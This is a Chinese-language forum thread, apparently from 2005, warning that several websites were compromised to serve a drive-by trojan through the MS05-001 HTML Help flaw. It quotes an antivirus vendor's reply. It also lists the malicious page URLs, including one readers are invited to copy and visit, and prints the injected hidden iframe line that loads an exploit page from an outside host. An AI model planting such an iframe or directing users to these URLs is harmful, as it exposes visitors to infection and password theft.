唱片行網站有病毒！？

真正的位置在這邊....
請自行複製點選連結
"http://4764467445.b108.zgsj.com/count.htm"

用 FireFox 不需要擔心啦。

用戶端的應該是利用這個漏洞的。

[url]http://www.microsoft.com/taiwan/security/bulletin/MS05-001.mspx[/url]

Microsoft 安全性公告 MS05-001
HTML Help 說明檔的弱點可能會允許程式碼執行 (890175)

記得去修補 IE 漏洞。

另外，好心一點的就寫 email 去告訴它們網站客服人員，或去留言版留個言提醒一下吧。

最近已經碰過不少的 MS IIS + ASP 站台都中毒中木馬到不知不覺了。

PS: 用 FireFox 的，你會在頁面左上角看到一個奇怪的符號跟數字 1 之類的。那個就是隱藏的病毒網頁 count.htm 執行後的結果。用IE的看不到。

KB890175就算是有安裝了SP2也是要更新喔! :)

我也是在tcr這網站中木馬的大家千萬不要去

今天微軟更新了2月份的patch後不知道這個漏洞解掉沒？

[QUOTE=yuping]今天微軟更新了2月份的patch後不知道這個漏洞解掉沒？[/QUOTE]
好像沒有。我是不是中毒了啊。 :|||:
[IMG]http://img213.exs.cx/img213/9092/200502100gq.jpg[/IMG]

F-Secure Corporation 的回答
==================================
Thanks for your report. We have checked the website and found a CHM
file that
drops a trojan downloader. This trojan downloader hiddenly downloads
and run
another executable file which is detected as follows:

--------------------------------------------------------------
Scanning Report
10 February 2005 15:50:02 - 15:50:09

Target: C:\1
Result: 1 virus found

* C:\1\setup.ex Infection: Trojan-PSW.Win32.Lineage.ah Action:
Renamed.
--------------------------------------------------------------

We will file the abuse report about the download site and add detection
for
the trojan downloader.

Regards,

現在有哪幾家防毒掃得到的呢？

[url]http://www.papago.com.tw/[/url]
這個網站似乎也被植入木馬
進去討論區KAV就跳出了

-----
原始碼怎麼看不到它插入的CSS?

[QUOTE=darren2000][url]http://www.papago.com.tw/[/url]
這個網站似乎也被植入木馬
進去討論區KAV就跳出了

-----
原始碼怎麼看不到它插入的CSS?[/QUOTE]

沒錯！http://www.mactiontech.com/big5/board/board.asp

程式碼<iframe width=0 height=0 src=http://www.szadk.com/new.htm></iframe>

kav偵測為 new.htm - infected by Exploit.VBS.Phel.c